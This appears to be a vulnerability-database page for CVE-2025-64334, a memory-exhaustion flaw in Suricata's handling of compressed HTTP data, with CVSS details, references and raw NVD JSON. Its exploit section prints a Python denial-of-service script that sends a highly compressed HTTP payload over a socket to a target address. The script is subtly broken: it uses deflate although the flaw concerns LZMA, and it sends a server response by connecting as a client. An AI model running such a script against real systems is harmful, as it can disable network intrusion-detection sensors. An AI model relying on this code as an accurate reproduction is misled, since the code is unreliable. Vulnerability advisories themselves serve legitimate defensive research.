Security Vulnerability Report
CVE-2025-64334 CVSS 7.5 HIGH

CVE-2025-64334

Published: 2025-11-26 23:15:49
Last Modified: 2025-12-05 19:51:29

Description

Suricata is a network IDS, IPS and NSM engine developed by the OISF (Open Information Security Foundation) and the Suricata community. In versions from 8.0.0 to before 8.0.2, compressed HTTP data can lead to unbounded memory growth during decompression. This issue has been patched in version 8.0.2. A workaround involves disabling LZMA decompression or limiting response-body-limit size.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:* - VULNERABLE
Suricata 8.0.0
Suricata 8.0.1
Suricata < 8.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-64334 PoC - Suricata LZMA Decompression Memory Exhaustion
# This PoC demonstrates sending a malicious HTTP response with highly compressible data
import socket
import zlib


def create_malicious_http_response():
    """
    Create HTTP response with compressed data that expands significantly
    during decompression
    """
    # Create data that compresses very well (repetitive pattern)
    # This will cause memory exhaustion during decompression
    original_data = b'A' * 1000000  # 1MB of repetitive data

    # Use zlib compression - creates small compressed data that expands significantly
    compressed_data = zlib.compress(original_data, 9)

    # Create HTTP response with compressed content
    http_response = b'HTTP/1.1 200 OK\r\n'
    http_response += b'Content-Encoding: deflate\r\n'
    http_response += b'Content-Length: ' + str(len(compressed_data)).encode() + b'\r\n'
    http_response += b'\r\n'
    http_response += compressed_data

    return http_response


def exploit_suricata(target_ip, target_port=80):
    """
    Send malicious HTTP response to trigger memory exhaustion in Suricata
    """
    malicious_response = create_malicious_http_response()

    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((target_ip, target_port))
        sock.send(malicious_response)
        sock.close()

        # Report the real sizes instead of a hard-coded expansion factor
        compressed_size = len(zlib.compress(b'A' * 1000000, 9))
        print(f"Malicious HTTP response sent to {target_ip}:{target_port}")
        print(f"Compressed size: {compressed_size} bytes")
        print(f"Decompressed size: 1000000 bytes ({1000000 // compressed_size}x expansion)")
    except Exception as e:
        print(f"Error: {e}")


if __name__ == "__main__":
    # Target Suricata instance
    target = "192.168.1.100"
    exploit_suricata(target)
```

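References

https://github.com/OISF/suricata/commit/00f04daa3a44928dfdd0003cb9735469272c94a1 (Patch)
https://github.com/OISF/suricata/security/advisories/GHSA-r5jf-v2gx-gx8w (Third Party Advisory)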

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64334", "sourceIdentifier": "[email protected]", "published": "2025-11-26T23:15:48.750", "lastModified": "2025-12-05T19:51:28.770", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Suricata is a network IDS, IPS and NSM engine developed by the OISF (Open Information Security Foundation) and the Suricata community. In versions from 8.0.0 to before 8.0.2, compressed HTTP data can lead to unbounded memory growth during decompression. This issue has been patched in version 8.0.2. A workaround involves disabling LZMA decompression or limiting response-body-limit size."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.0.2", "matchCriteriaId": "C93A731C-19AD-4067-B28C-17164C2D981D"}]}]}], "references": [{"url": "https://github.com/OISF/suricata/commit/00f04daa3a44928dfdd0003cb9735469272c94a1", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/OISF/suricata/security/advisories/GHSA-r5jf-v2gx-gx8w", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}